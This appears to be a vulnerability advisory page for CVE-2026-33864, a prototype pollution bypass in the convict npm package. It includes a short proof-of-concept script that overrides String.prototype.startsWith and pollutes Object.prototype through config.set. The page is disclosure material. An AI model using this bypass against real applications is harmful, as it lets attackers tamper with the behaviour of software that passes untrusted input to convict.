Deploy autonomous AI agents that reason, exploit, and validate complex vulnerability chains — not another scanner, an agentic system that thinks like a senior pentester.
CVE-2026-33864 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
A prototype pollution vulnerability exists in the latest version of the convict npm package (6.2.4). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input started with a forbidden key, it is still possible to pollute Object.prototype via a crafted input using String.prototype.
The vulnerability resides in line 564 of https://github.com/mozilla/node-convict/blob/master/packages/convict/src/main.js where startsWith() function is used to check whether user provided input contain forbidden strings.
npm install or cloning from gitString.prototype.startsWith = () => false;
const convict = require('convict');
let obj = {};
const config = convict(obj);
console.log({}.polluted);
config.set('constructor.prototype.polluted', 'yes');
console.log({}.polluted); // prints yes -> the patch is bypassed and prototype pollution occurred
Prototype pollution should be prevented and {} should not gain new properties. This should be printed on the console:
undefined
undefined OR throw an Error
Object.prototype is polluted
This is printed on the console:
undefined
yes
This is a prototype pollution vulnerability, which can have severe security implications depending on how convict is used by downstream applications. Any application that processes attacker-controlled input using convict.set may be affected.
It could potentially lead to the following problems:
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.